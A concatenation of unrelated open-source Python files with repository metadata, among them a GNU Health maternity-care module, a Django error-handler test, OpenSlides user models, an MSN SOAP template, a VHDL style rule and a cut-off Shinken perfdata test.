                elif vacc.cdate_year is not None and vacc.cdate_month is not None and vacc.cdate_month != '':
result[vacc.id] = "{0} {1}".format(month_num_to_abbrev(vacc.cdate_month), vacc.cdate_year)
else:
result[vacc.id] = "{0}".format(vacc.cdate)
return result
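    # Example: cdate_year=2012 alone displays '2012'; cdate_year=2012 with
    # cdate_month='03' displays 'Mar 2012'; otherwise the exact cdate is shown.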
# --------------------------------------------------------
# Revise validation to not require the next_dose_date field.
# --------------------------------------------------------
    @staticmethod
    def validate_next_dose_date(ids):
        for vaccine_data in ids:
            if vaccine_data.next_dose_date is None:
                continue
            if vaccine_data.next_dose_date < vaccine_data.date:
                return False
        return True
@staticmethod
def default_cdate():
return datetime.datetime.now()
@staticmethod
def default_cdate_month():
return ''
@staticmethod
def default_cdate_year():
return None
class MmcPatientMedication(ModelSQL, ModelView):
'Patient Medication'
__name__ = 'gnuhealth.patient.medication'
# --------------------------------------------------------
# Change the field label.
# --------------------------------------------------------
doctor = fields.Many2One('gnuhealth.physician', 'Name',
help='Name of person who prescribed the medicament')
class MmcMedicationTemplate(ModelSQL, ModelView):
'Template for medication'
__name__ = 'gnuhealth.medication.template'
# --------------------------------------------------------
# Change the field label.
# --------------------------------------------------------
medicament = fields.Many2One('gnuhealth.medicament', 'Name of Med',
required=True, help='Prescribed Medicine')
class MmcPatientPregnancy(ModelSQL, ModelView):
'Patient Pregnancy'
__name__ = 'gnuhealth.patient.pregnancy'
# --------------------------------------------------------
# Change the field labels.
# --------------------------------------------------------
pdd = fields.Function (fields.Date('Due Date'), 'get_pregnancy_data')
perinatal = fields.One2Many('gnuhealth.perinatal', 'name', 'Labor')
puerperium_monitor = fields.One2Many('gnuhealth.puerperium.monitor',
'name', 'Postpartum')
pregnancy_end_date = fields.DateTime ('Date/time of birth',
states={
'invisible': Bool(Eval('current_pregnancy')),
'required': Not(Bool(Eval('current_pregnancy'))),
})
# --------------------------------------------------------
# Add an alternative due date field.
# --------------------------------------------------------
apdd = fields.Date('Alt Due Date',
help="Enter the alternative pregnancy due date if there is one")
# --------------------------------------------------------
# Add partner information for this pregnancy.
# --------------------------------------------------------
partner_first_name = fields.Char('Partner first name',
help="The partner or husband's first name")
partner_last_name = fields.Char('Partner last name',
help="The partner or husband's last name")
partner_age = fields.Integer('Partner age',
help="The age in years of the partner")
partner_employment = fields.Char('Partner work',
help="The work of the partner")
partner_education = fields.Char('Partner education',
help="The amount of education that the partner has completed")
partner_income = fields.Integer('Partner income',
help="The amount of pesos per month the partner earns")
patient_income = fields.Integer('Patient income',
help="The amount of pesos per month the patient earns")
# --------------------------------------------------------
# Add fields for the immediate postpartum stage. These are
# summary fields, ie. they are summarized from the charts.
# --------------------------------------------------------
pp_immed_cr_high = fields.Integer('High CR')
pp_immed_cr_low = fields.Integer('Low CR')
pp_immed_fundus_desc = fields.Char('Fundus Desc', size=30, help="Fundus description")
pp_immed_ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
pp_immed_comments = fields.Char('Comments', size=100, help="Comments")
# --------------------------------------------------------
# Add two new sections for postpartum: continuing and ongoing.
# --------------------------------------------------------
postpartum_continued = fields.One2Many(
'gnuhealth.postpartum.continued.monitor',
'name', 'Postpartum Continued Monitor')
postpartum_ongoing = fields.One2Many(
'gnuhealth.postpartum.ongoing.monitor',
'name', 'Postpartum Ongoing Monitor')
# --------------------------------------------------------
# Add doctor/dentist consult date fields.
# --------------------------------------------------------
doctor_consult_date = fields.Date('Dr consult date',
help="The date that the patient consulted a doctor")
dentist_consult_date = fields.Date('Dentist consult date',
help="The date that the patient consulted a dentist")
# --------------------------------------------------------
# Add other miscellaneous fields.
# --------------------------------------------------------
mb_book = fields.Boolean('MB Book', help="Patient has MB Book?")
iodized_salt = fields.Boolean('Iodized Salt', help="Patient uses iodized salt")
where_deliver = fields.Char('Where deliver?', help="Where will patient deliver?")
# --------------------------------------------------------
# We don't use this field, and it is always one because
# by law the lay-in clinic cannot handle multiple births.
# --------------------------------------------------------
@staticmethod
def default_fetuses():
return 1
class MmcPrenatalEvaluation(ModelSQL, ModelView):
'Prenatal and Antenatal Evaluations'
__name__ = 'gnuhealth.patient.prenatal.evaluation'
@staticmethod
def get_patient_evaluation_data(ids, name):
result = {}
for evaluation_data in ids:
if name == 'gestational_weeks':
gestational_age = datetime.datetime.date(evaluation_data.evaluation_date) - evaluation_data.name.lmp
result[evaluation_data.id] = (gestational_age.days)/7
if name == 'gestational_days':
gestational_age = datetime.datetime.date(evaluation_data.evaluation_date) - evaluation_data.name.lmp
result[evaluation_data.id] = gestational_age.days
if name == 'gestational_age':
gestational_age = datetime.datetime.date(evaluation_data.evaluation_date) - evaluation_data.name.lmp
result[evaluation_data.id] = "{0} {1}/7".format((gestational_age.days)/7, (gestational_age.days)%7)
if name == 'bp':
result[evaluation_data.id] = "{0}/{1}".format(evaluation_data.systolic, evaluation_data.diastolic)
if name == 'eval_date_only':
result[evaluation_data.id] = datetime.datetime.date(evaluation_data.evaluation_date)
return result
# --------------------------------------------------------
# Change the field labels.
# --------------------------------------------------------
evaluation_date = fields.DateTime('Admission', required=True)
fetus_heart_rate = fields.Integer('FHT', help="Fetus heart rate")
fundal_height = fields.Integer('FH',
help="Distance between the symphysis pubis and the uterine fundus " \
"(S-FD) in cm")
# --------------------------------------------------------
# Add additional fields.
# --------------------------------------------------------
discharge = fields.DateTime('Discharge', help='Time the patient left')
weight = fields.Numeric("Weight (kg)", (3,1), help="Mother's weight in kilos")
systolic = fields.Integer('Systolic Pressure')
diastolic = fields.Integer('Diastolic Pressure')
cr = fields.Integer("CR", help="Mother's heart rate")
    rr = fields.Integer("RR", help="Mother's respiratory rate")
    temperature = fields.Float('Temp (C)', help='Temperature in Celsius of the mother')
position = fields.Char("Position", help="Baby's position")
examiner = fields.Char('Examiner', help="Who did the examination?")
next_appt = fields.Date('Next Scheduled Date', help="Date of next prenatal exam")
# --------------------------------------------------------
# Add a gestational_age field. Health_gyneco has two similar
# fields: gestational_weeks and gestational_days. The former
    # is only granular to the week, the latter to the day. MMC
# staff is used to the GA field being the number of weeks and
# a fractional part with the denominator the number 7, e.g.
# 33 2/7. Our gestational_age field will attempt to get close
# to that.
# --------------------------------------------------------
gestational_age = fields.Function(fields.Char('GA'),
'get_patient_evaluation_data')
# --------------------------------------------------------
# Add a convenience function that displays the blood pressure
# as one field instead of two. Useful for the tree view.
# --------------------------------------------------------
bp = fields.Function(fields.Char('B/P'), 'get_patient_evaluation_data')
# --------------------------------------------------------
# Add a display field for the tree view that only shows the
# admission date and not the time.
# --------------------------------------------------------
eval_date_only = fields.Function(fields.Date('Date'), 'get_patient_evaluation_data')
class MmcPerinatal(ModelSQL, ModelView):
'Perinatal Information'
__name__ = 'gnuhealth.perinatal'
@staticmethod
def get_perinatal_information(ids, name):
result = {}
for perinatal_data in ids:
if name == 'gestational_weeks':
gestational_age = datetime.datetime.date(perinatal_data.admission_date) - perinatal_data.name.lmp
result[perinatal_data.id] = (gestational_age.days)/7
return result
# --------------------------------------------------------
# Change selection list.
# --------------------------------------------------------
start_labor_mode = fields.Selection([
('nsd', 'NSD'),
('o', 'Other'),
], 'Delivery mode', sort=False)
# --------------------------------------------------------
# Placenta delivery fields.
# --------------------------------------------------------
placenta_datetime = fields.DateTime('Placenta delivery')
placenta_expulsion = fields.Selection([
('s', 'Schult'),
('d', 'Duncan'),
], 'Placenta expulsion', sort=False)
placenta_delivery = fields.Selection([
('s', 'Spontaneous'),
('cct', 'CCT'),
('ma', 'Manual Assist'),
('mr', 'Manual Removal'),
], 'Placenta delivery type', sort=False)
placenta_duration = fields.Integer('Duration (min)',
help="Duration of the placenta delivery in minutes")
ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
# --------------------------------------------------------
# Additional intake fields.
# --------------------------------------------------------
begin_labor_intake = fields.DateTime('Labor start')
pos_intake = fields.Char('POS', size=10)
fundal_height_intake = fields.Integer('Fundal Height')
systolic_intake = fields.Integer('Systolic Pressure')
diastolic_intake = fields.Integer('Diastolic Pressure')
cr_intake = fields.Integer("CR", help="Mother's heart rate")
fetus_cr_intake = fields.Integer("FHT", help="Fetus heart rate")
    temperature_intake = fields.Float('Temp (C)', help='Temperature in Celsius of the mother')
examiner_intake = fields.Char('Examiner', required=True)
class MmcPerinatalMonitor(ModelSQL, ModelView):
'Perinatal Monitor'
__name__ = 'gnuhealth.perinatal.monitor'
# --------------------------------------------------------
# Rename the labels of these fields.
# --------------------------------------------------------
frequency = fields.Integer('CR')
f_frequency = fields.Integer('FHT')
# --------------------------------------------------------
# Add a new value.
# --------------------------------------------------------
fetus_position = fields.Selection([
('c', 'Cephalic'),
('o', 'Occiput / Cephalic Posterior'),
('fb', 'Frank Breech'),
('cb', 'Complete Breech'),
('t', 'Transverse Lie'),
        ('f', 'Footling Breech'),
], 'Fetus Position', sort=False)
# --------------------------------------------------------
# Hide these fields.
# --------------------------------------------------------
contractions = fields.Integer('Contractions', states={'invisible': True})
# --------------------------------------------------------
# Add these fields.
# --------------------------------------------------------
contractionsStr = fields.Char('Contractions', size=12)
# --------------------------------------------------------
# Default field values.
# --------------------------------------------------------
@staticmethod
def default_fetus_position():
return 'c'
class MmcPuerperiumMonitor(ModelSQL, ModelView):
'Puerperium Monitor'
__name__ = 'gnuhealth.puerperium.monitor'
# --------------------------------------------------------
# Change the labels of these fields.
# --------------------------------------------------------
    temperature = fields.Float('Temp (C)', help='Temperature in Celsius of the mother')
frequency = fields.Integer('CR')
# --------------------------------------------------------
# Add additional fields.
# --------------------------------------------------------
ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
examiner = fields.Char('Examiner', required=True)
# --------------------------------------------------------
# Add a convenience function that displays the blood pressure
# as one field instead of two. Useful for the tree view.
# --------------------------------------------------------
bp = fields.Function(fields.Char('B/P'), 'get_patient_evaluation_data')
# --------------------------------------------------------
# Add a display field for the tree view that only shows the
# admission date and not the time.
# --------------------------------------------------------
eval_date_only = fields.Function(fields.Date('Date'), 'get_patient_evaluation_data')
@staticmethod
def get_patient_evaluation_data(ids, name):
result = {}
for evaluation_data in ids:
if name == 'bp':
result[evaluation_data.id] = "{0}/{1}".format(evaluation_data.systolic, evaluation_data.diastolic)
if name == 'eval_date_only':
result[evaluation_data.id] = datetime.datetime.date(evaluation_data.date)
return result
class Address(ModelSQL, ModelView):
"Address"
__name__ = 'party.address'
# --------------------------------------------------------
# Change labels, adjust help, etc.
# --------------------------------------------------------
name = fields.Char('Addr Name', help="Example: Home, mother's house, prior home, etc.",
states={'readonly': ~Eval('active'),}, depends=['active'])
street = fields.Char('Address',
states={'readonly': ~Eval('active'),}, depends=['active'])
# --------------------------------------------------------
# Add new fields.
# --------------------------------------------------------
barangay = fields.Char('Barangay', help="The patient's barangay")
is_agdao = fields.Boolean('Is from Agdao?',
help="Check if the patient is from Agdao")
@staticmethod
def default_city():
# TODO: do this right.
return 'Davao City'
class MmcPostpartumContinuedMonitor(ModelSQL, ModelView):
'Postpartum Continued Monitor'
__name__ = 'gnuhealth.postpartum.continued.monitor'
name = fields.Many2One('gnuhealth.patient.pregnancy', 'Patient Pregnancy')
date_time = fields.DateTime('Date/Time', required=True)
initials = fields.Char('Initials', size=10, help="Who did the examination?")
# --------------------------------------------------------
# Mother's fields.
# --------------------------------------------------------
systolic = fields.Integer('Systolic Pressure', help="Mother's systolic")
diastolic = fields.Integer('Diastolic Pressure', help="Mother's diastolic")
mother_cr = fields.Integer("CR", help="Mother's heart rate")
    mother_temp = fields.Float('Temp (C)', help='Temperature in Celsius of the mother')
fundus_desc = fields.Char('Fundus Desc', size=30, help="Fundus description")
ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
# --------------------------------------------------------
# Baby's fields.
# --------------------------------------------------------
    bfed = fields.Boolean('BFed', help="Breast Fed")
    baby_temp = fields.Float('Baby Temp (C)', help='Temperature in Celsius of the baby')
    baby_rr = fields.Integer("Baby RR", help="Baby's respiratory rate")
    baby_cr = fields.Integer("Baby CR", help="Baby's heart rate")
comments = fields.Char('Comments', size=100, help="Comments")
# --------------------------------------------------------
# Add a convenience function that displays the blood pressure
# as one field instead of two. Useful for the tree view.
# --------------------------------------------------------
bp = fields.Function(fields.Char('B/P'), 'get_patient_evaluation_data')
@staticmethod
def get_patient_evaluation_data(ids, name):
result = {}
for evaluation_data in ids:
if name == 'bp':
                if evaluation_data.systolic is None or evaluation_data.diastolic is None:
result[evaluation_data.id] = ''
else:
result[evaluation_data.id] = "{0}/{1}".format(evaluation_data.systolic, evaluation_data.diastolic)
return result
class MmcPostpartumOngoingMonitor(ModelSQL, ModelView):
'Postpartum Ongoing Monitor'
__name__ = 'gnuhealth.postpartum.ongoing.monitor'
name = fields.Many2One('gnuhealth.patient.pregnancy', 'Patient Pregnancy')
# --------------------------------------------------------
# Examination fields.
# --------------------------------------------------------
date_time = fields.DateTime('Date/Time', required=True)
initials = fields.Char('Initials', size=10, required=True,
help="Who did the examination?")
# --------------------------------------------------------
# Baby fields.
# --------------------------------------------------------
b_weight = fields.Integer('Weight', help="Weight in grams")
    b_temp = fields.Float('Temp (C)', help='Temperature in Celsius of the baby')
    b_cr = fields.Integer("Baby CR", help="Baby's heart rate")
    b_rr = fields.Integer("Baby RR", help="Baby's respiratory rate")
b_lungs = fields.Char('Lungs', size=70)
b_skin = fields.Char('Color/Skin', size=70)
b_cord = fields.Char('Cord', size=70)
b_urine_last_24 = fields.Char('Urine last 24 hours', size=70)
b_stool_last_24 = fields.Char('Stool last 24 hours', size=70)
b_ss_infection = fields.Char('SS Infection', size=70)
b_feeding = fields.Char('Feeding', size=70)
b_nbs = fields.DateTime('NBS')
b_bcg = fields.Char('BCG', size=70)
b_other = fields.Char('Other', size=70)
# --------------------------------------------------------
# Mother fields.
# --------------------------------------------------------
    m_temp = fields.Float('Temp (C)', help='Temperature in Celsius of the mother')
m_systolic = fields.Integer('Systolic Pressure', help="Mother's systolic")
m_diastolic = fields.Integer('Diastolic Pressure', help="Mother's diastolic")
m_cr = fields.Integer("CR", help="Mother's heart rate")
m_breasts = fields.Char('Breasts', size=70)
m_fundus = fields.Char('Fundus', size=70)
m_perineum = fields.Char('Perineum', size=70)
m_lochia = fields.Char('Lochia', size=70)
m_urine = fields.Char('Urine', size=70)
m_stool = fields.Char('Stool', size=70)
m_ss_infection = fields.Char('SS Infection', size=70)
m_other = fields.Char('Other', size=70)
m_next_visit = fields.DateTime('Next Scheduled Visit')
|
kbsymanz/gnuhealth_mmc
|
mmc.py
|
Python
|
mit
| 35,273 | 0.003714 |
from django.conf.urls import url
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.test import SimpleTestCase, override_settings
def template_response_error_handler(request, exception=None):
return TemplateResponse(request, 'test_handler.html', status=403)
def permission_denied_view(request):
raise PermissionDenied
urlpatterns = [
url(r'^$', permission_denied_view),
]
handler403 = template_response_error_handler
@override_settings(ROOT_URLCONF='handlers.tests_custom_error_handlers')
class CustomErrorHandlerTests(SimpleTestCase):
def test_handler_renders_template_response(self):
"""
BaseHandler should render TemplateResponse if necessary.
"""
response = self.client.get('/')
self.assertContains(response, 'Error handler content', status_code=403)
|
jejimenez/django
|
tests/handlers/tests_custom_error_handlers.py
|
Python
|
bsd-3-clause
| 888 | 0 |
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2005, 2006 Async Open Source
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
""" Basic slave definitions """
from stoqlib.lib.translation import stoqlib_gettext
from stoqlib.gui.editors.baseeditor import BaseEditorSlave
_ = stoqlib_gettext
# FIXME: s/NoteSlave/NotesSlave/ and move this to stoqlib.gui.slaves.notesslave
class NoteSlave(BaseEditorSlave):
""" Slave store general notes. The model must have an attribute 'notes'
to work.
"""
gladefile = 'NoteSlave'
proxy_widgets = ('notes', )
def __init__(self, store, model, visual_mode=False):
self.model = model
self.model_type = self.model_type or type(model)
BaseEditorSlave.__init__(self, store, self.model,
visual_mode=visual_mode)
self.notes.set_accepts_tab(False)
def setup_proxies(self):
self.proxy = self.add_proxy(self.model,
NoteSlave.proxy_widgets)
|
andrebellafronte/stoq
|
stoqlib/gui/base/slaves.py
|
Python
|
gpl-2.0
| 1,749 | 0.007433 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Johann Prieur <johann.prieur@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
import xml.sax.saxutils as xml
def soap_header(from_member_name, friendly_name, proxy, msnp_ver, build_ver,
to_member_name, message_number, security_token, app_id,
lock_key):
"""Returns the SOAP xml header"""
# FIXME : escape the parameters
return """<From memberName="%(from_member_name)s" friendlyName="%(friendly_name)s" xml:lang="en-US" proxy="%(proxy)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/" msnpVer="%(msnp_ver)s" buildVer="%(build_ver)s"/>
<To memberName="%(to_member_name)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Ticket passport="%(passport)s" appid="%(app_id)s" lockkey="%(lock_key)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Sequence xmlns="http://schemas.xmlsoap.org/ws/2003/03/rm">
<Identifier xmlns="http://schemas.xmlsoap.org/ws/2002/07/utility">
http://messenger.msn.com
</Identifier>
<MessageNumber>%(message_number)s</MessageNumber>
</Sequence>""" % { 'from_member_name' : from_member_name,
'friendly_name' : friendly_name,
'proxy' : proxy,
'msnp_ver' : msnp_ver,
'build_ver' : build_ver,
'to_member_name' : to_member_name,
'passport' : xml.escape(security_token),
'app_id' : app_id,
'lock_key' : lock_key,
'message_number' : message_number }
def transport_headers():
"""Returns a dictionary, containing transport (http) headers
to use for the request"""
return {}
def soap_action():
"""Returns the SOAPAction value to pass to the transport
or None if no SOAPAction needs to be specified"""
return "http://messenger.live.com/ws/2006/09/oim/Store2"
def soap_body(message_type, message_content):
"""Returns the SOAP xml body"""
return """<MessageType xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</MessageType>
<Content xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</Content>""" % (message_type, message_content)
def process_response(soap_response):
return True
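A rough composition sketch (every value below is a hypothetical placeholder, not a real credential or token):

header = soap_header('alice@example.com', 'Alice', 'MSNMSGR', 'MSNP15',
                     '8.5.1302', 'bob@example.com', 1, 't=token', 'app-id',
                     'lock-key')
body = soap_body('text', 'SGVsbG8=')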
|
emesene/papyon
|
papyon/service/description/OIM/Store2.py
|
Python
|
gpl-2.0
| 3,213 | 0.009648 |
import smtplib
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
Group as DjangoGroup,
GroupManager as _GroupManager,
Permission,
PermissionsMixin,
)
from django.core import mail
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db import models
from django.db.models import Prefetch
from django.utils import timezone
from jsonfield import JSONField
from openslides.utils.manager import BaseManager
from ..core.config import config
from ..utils.auth import GROUP_ADMIN_PK
from ..utils.autoupdate import inform_changed_data
from ..utils.models import (
CASCADE_AND_AUTOUPDATE,
SET_NULL_AND_AUTOUPDATE,
RESTModelMixin,
)
from .access_permissions import (
GroupAccessPermissions,
PersonalNoteAccessPermissions,
UserAccessPermissions,
)
class UserManager(BaseUserManager):
"""
Customized manager that creates new users only with a password and a
username. It also supports our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, ids=None):
"""
Returns the normal queryset with all users. In the background all
groups are prefetched from the database together with all permissions
and content types.
"""
queryset = self.get_queryset()
if ids:
queryset = queryset.filter(pk__in=ids)
return queryset.prefetch_related(
Prefetch(
"groups",
queryset=Group.objects.select_related("group_ptr").prefetch_related(
Prefetch(
"permissions",
queryset=Permission.objects.select_related("content_type"),
)
),
),
"vote_delegated_from_users",
)
def create_user(self, username, password, skip_autoupdate=False, **kwargs):
"""
Creates a new user only with a password and a username.
"""
user = self.model(username=username, **kwargs)
user.set_password(password)
user.save(skip_autoupdate=skip_autoupdate, using=self._db)
return user
def create_or_reset_admin_user(self, skip_autoupdate=False):
"""
Creates an user with the username 'admin'. If such a user already
exists, resets it. The password is (re)set to 'admin'. The user
becomes member of the group 'Admin'.
"""
created = False
try:
admin = self.get(username="admin")
except ObjectDoesNotExist:
admin = self.model(username="admin", last_name="Administrator")
created = True
admin.default_password = "admin"
admin.password = make_password(admin.default_password)
admin.save(skip_autoupdate=skip_autoupdate)
admin.groups.add(GROUP_ADMIN_PK)
if not skip_autoupdate:
inform_changed_data(admin)
return created
def generate_username(self, first_name, last_name):
"""
Generates a username from first name and last name.
"""
first_name = first_name.strip()
last_name = last_name.strip()
if first_name and last_name:
base_name = " ".join((first_name, last_name))
else:
base_name = first_name or last_name
if not base_name:
raise ValueError(
"Either 'first_name' or 'last_name' must not be empty."
)
if not self.filter(username=base_name).exists():
generated_username = base_name
else:
counter = 0
while True:
counter += 1
test_name = f"{base_name} {counter}"
if not self.filter(username=test_name).exists():
generated_username = test_name
break
return generated_username
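    # Example: if a user named 'Jane Doe' already exists,
    # generate_username('Jane', 'Doe') returns 'Jane Doe 1'; the counter keeps
    # incrementing until a free username is found.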
class User(RESTModelMixin, PermissionsMixin, AbstractBaseUser):
"""
Model for users in OpenSlides. A client can login as an user with
credentials. An user can also just be used as representation for a person
in other OpenSlides apps like motion submitter or (assignment) election
candidates.
"""
access_permissions = UserAccessPermissions()
USERNAME_FIELD = "username"
username = models.CharField(max_length=255, unique=True, blank=True)
auth_type = models.CharField(max_length=64, default="default")
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
gender = models.CharField(max_length=255, blank=True)
email = models.EmailField(blank=True)
last_email_send = models.DateTimeField(blank=True, null=True)
# TODO: Try to remove the default argument in the following fields.
structure_level = models.CharField(max_length=255, blank=True, default="")
title = models.CharField(max_length=50, blank=True, default="")
number = models.CharField(max_length=50, blank=True, default="")
about_me = models.TextField(blank=True, default="")
comment = models.TextField(blank=True, default="")
default_password = models.CharField(max_length=100, blank=True, default="")
is_active = models.BooleanField(default=True)
is_present = models.BooleanField(default=False)
is_committee = models.BooleanField(default=False)
vote_weight = models.DecimalField(
default=Decimal("1"), max_digits=15, decimal_places=6, null=False, blank=True
)
vote_delegated_to = models.ForeignKey(
"self",
on_delete=SET_NULL_AND_AUTOUPDATE,
null=True,
blank=True,
related_name="vote_delegated_from_users",
)
objects = UserManager()
class Meta:
default_permissions = ()
permissions = (
("can_see_name", "Can see names of users"),
(
"can_see_extra_data",
"Can see extra data of users (e.g. email and comment)",
),
("can_change_password", "Can change its own password"),
("can_manage", "Can manage users"),
)
ordering = ("last_name", "first_name", "username")
def __str__(self):
# Strip white spaces from the name parts
first_name = self.first_name.strip()
last_name = self.last_name.strip()
# The user has a last_name and a first_name
if first_name and last_name:
name = " ".join((self.first_name, self.last_name))
# The user has only a first_name or a last_name or no name
else:
name = first_name or last_name or self.username
# Return result
return name
def save(self, *args, **kwargs):
"""
Overridden method to skip autoupdate if only last_login field was
updated as it is done during login.
"""
if kwargs.get("update_fields") == ["last_login"]:
kwargs["skip_autoupdate"] = True
return super().save(*args, **kwargs)
def has_perm(self, perm):
"""
        This method is disabled. Do not use it; use openslides.utils.auth.has_perm instead.
"""
raise RuntimeError(
"Do not use user.has_perm() but use openslides.utils.auth.has_perm"
)
def send_invitation_email(
self, connection, subject, message, skip_autoupdate=False
):
"""
        Sends an invitation email to the user. Returns True on success, False on failure.
        May raise a ValidationError, if something went wrong.
"""
if not self.email:
return False
        # Custom dict class so that format strings with entries like
        # {not_existent} raise no error; missing keys are replaced with ''.
class format_dict(dict):
def __missing__(self, key):
return ""
message_format = format_dict(
{
"name": str(self),
"event_name": config["general_event_name"],
"url": config["users_pdf_url"],
"username": self.username,
"password": self.default_password,
}
)
try:
message = message.format(**message_format)
except KeyError as err:
raise ValidationError({"detail": "Invalid property {0}", "args": [err]})
subject_format = format_dict(
{"event_name": config["general_event_name"], "username": self.username}
)
try:
subject = subject.format(**subject_format)
except KeyError as err:
raise ValidationError({"detail": "Invalid property {0}", "args": [err]})
# Create an email and send it.
email = mail.EmailMessage(
subject,
message,
config["users_email_sender"] + " <" + settings.DEFAULT_FROM_EMAIL + ">",
[self.email],
reply_to=[config["users_email_replyto"]],
)
try:
count = connection.send_messages([email])
except smtplib.SMTPDataError as e:
error = e.smtp_code
helptext = ""
            # Error 554: the server does not accept our connection; the reply is
            # something like "transaction failed" or "No SMTP service here".
            if error == 554:
                helptext = " Is the email sender correct?"
connection.close()
raise ValidationError(
{
"detail": "Error {0}. Cannot send email.{1}",
"args": [error, helptext],
}
)
except smtplib.SMTPRecipientsRefused:
pass # Run into returning false later
except smtplib.SMTPAuthenticationError as e:
# Nice error message on auth failure
raise ValidationError(
{
"detail": "Error {0}: Authentication failure. Please contact your local administrator.",
"args": [e.smtp_code],
}
)
else:
if count == 1:
self.email_send = True
self.last_email_send = timezone.now()
self.save(skip_autoupdate=skip_autoupdate)
return True
return False
@property
def session_auth_hash(self):
"""
Returns the session auth hash of a user as attribute.
Needed for the django rest framework.
"""
return self.get_session_auth_hash()
class GroupManager(_GroupManager):
"""
Customized manager that supports our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, ids=None):
"""
Returns the normal queryset with all groups. In the background all
permissions with the content types are prefetched from the database.
"""
queryset = self.get_queryset()
if ids:
queryset = queryset.filter(pk__in=ids)
return queryset.select_related("group_ptr").prefetch_related(
Prefetch(
"permissions",
queryset=Permission.objects.select_related("content_type"),
)
)
class Group(RESTModelMixin, DjangoGroup):
"""
Extend the django group with support of our REST and caching system.
"""
access_permissions = GroupAccessPermissions()
objects = GroupManager()
class Meta:
default_permissions = ()
class PersonalNoteManager(BaseManager):
"""
Customized model manager to support our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, *args, **kwargs):
"""
Returns the normal queryset with all personal notes. In the background all
users are prefetched from the database.
"""
return super().get_prefetched_queryset(*args, **kwargs).select_related("user")
class PersonalNote(RESTModelMixin, models.Model):
"""
Model for personal notes (e. g. likes/stars) of a user concerning different
openslides objects like motions.
"""
access_permissions = PersonalNoteAccessPermissions()
personalized_model = True
"""
Each model belongs to one user. This relation is set during creation and
will not be changed.
"""
objects = PersonalNoteManager()
user = models.OneToOneField(User, on_delete=CASCADE_AND_AUTOUPDATE)
notes = JSONField()
class Meta:
default_permissions = ()
|
jwinzer/OpenSlides
|
server/openslides/users/models.py
|
Python
|
mit
| 12,597 | 0.001111 |
from vsg.rules import token_prefix
from vsg import token
lTokens = []
lTokens.append(token.signal_declaration.identifier)
class rule_008(token_prefix):
'''
This rule checks for valid prefixes on signal identifiers.
Default signal prefix is *s\_*.
|configuring_prefix_and_suffix_rules_link|
**Violation**
.. code-block:: vhdl
signal wr_en : std_logic;
signal rd_en : std_logic;
**Fix**
.. code-block:: vhdl
signal s_wr_en : std_logic;
signal s_rd_en : std_logic;
'''
def __init__(self):
token_prefix.__init__(self, 'signal', '008', lTokens)
self.prefixes = ['s_']
self.solution = 'Signal identifiers'
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/rules/signal/rule_008.py
|
Python
|
gpl-3.0
| 705 | 0.001418 |
#!/usr/bin/env python
# Copyright (C) 2009-2010:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from shinken_test import *
from shinken.misc.perfdata import Metric, PerfDatas
class TestParsePerfdata(ShinkenTest):
# Uncomment this is you want to use a specific configuration
# for your test
#def setUp(self):
# self.setup_with_file('etc/nagios_parse_perfdata.cfg')
def test_parsing_perfdata(self):
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;0;3827 memused=1550MB;2973;3964;0;5810'
s = 'ramused=1009MB;;;0;1982'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 1009)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == 0)
self.assert_(m.max == 1982)
s = 'ramused=90%;85;95;;'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == 85)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
